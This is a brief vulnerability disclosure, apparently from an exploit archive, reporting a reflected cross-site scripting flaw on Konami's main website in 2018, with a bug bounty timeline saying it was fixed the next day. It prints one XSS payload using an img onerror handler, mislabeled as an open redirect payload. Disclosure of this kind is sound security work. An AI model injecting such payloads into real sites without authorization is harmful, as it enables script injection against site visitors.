Konami.com Cross Site Scripting

Konami.com suffers from a cross site scripting vulnerability.


MD5 | 9c435a5c3770a083fd4dfe5f11050cde

# Exploit Title: [ Reflected XSS at KONAMI ]

# Date: [ 07.06.2018 ]

# Exploit Author: [ Ismail Tasdelen ]

# Vendor Homepage: [ https://www.konami.com/ ]

# Software : [ KONAMI MAIN WEBSITE ]

# Software Version : [ 1.0.0 ]

# Vulnerability : Reflected XSS

# Open Redirect Payload : 1'"><img src=x onerror=prompt(/ismailtasdelen/)>

# Type: Webapps

# PoC Video : https://www.youtube.com/watch?v=nBQlB1yBO2Q

# Test on : Kali Linux - Google Chrome / Mozilla FireFox -- Last Version

# Bug Bounty Time Line :

Report Date : 6-06-2018
Triage Date : 7-06-2018
Fixed Date : 7-06-2018

# You want to follow my activity ?

https://www.linkedin.com/in/ismailtasdelen
https://github.com/ismailtasdelen
https://twitter.com/ismailtsdln


Related Posts